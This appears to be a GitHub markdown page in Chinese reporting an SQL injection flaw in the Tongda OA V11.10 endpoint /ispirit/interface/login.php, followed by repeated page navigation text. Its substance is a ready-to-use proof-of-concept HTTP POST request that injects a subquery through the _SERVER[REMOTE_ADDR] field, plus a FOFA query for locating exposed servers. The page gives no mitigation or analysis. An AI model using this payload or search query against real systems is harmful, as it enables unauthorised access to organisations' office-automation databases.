通达OAV11.10接口login.php存在SQL注入漏洞

通达OAV11.10接口 /ispirit/interface/login.php 存在SQL注入漏洞。

fofa

app="TDXK-通达OA"

poc

POST /ispirit/interface/login.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36 
Content-Type: application/x-www-form-urlencoded
Host:
Content-Length: 107

name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1% 3d0,1,(select+~0%2b1))+limit+0,1))--+'

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

通达OAV11.10接口login.php存在SQL注入漏洞.md

通达OAV11.10接口login.php存在SQL注入漏洞.md

通达OAV11.10接口login.php存在SQL注入漏洞

fofa

poc

Files

通达OAV11.10接口login.php存在SQL注入漏洞.md

Latest commit

History

通达OAV11.10接口login.php存在SQL注入漏洞.md

File metadata and controls

通达OAV11.10接口login.php存在SQL注入漏洞

fofa

poc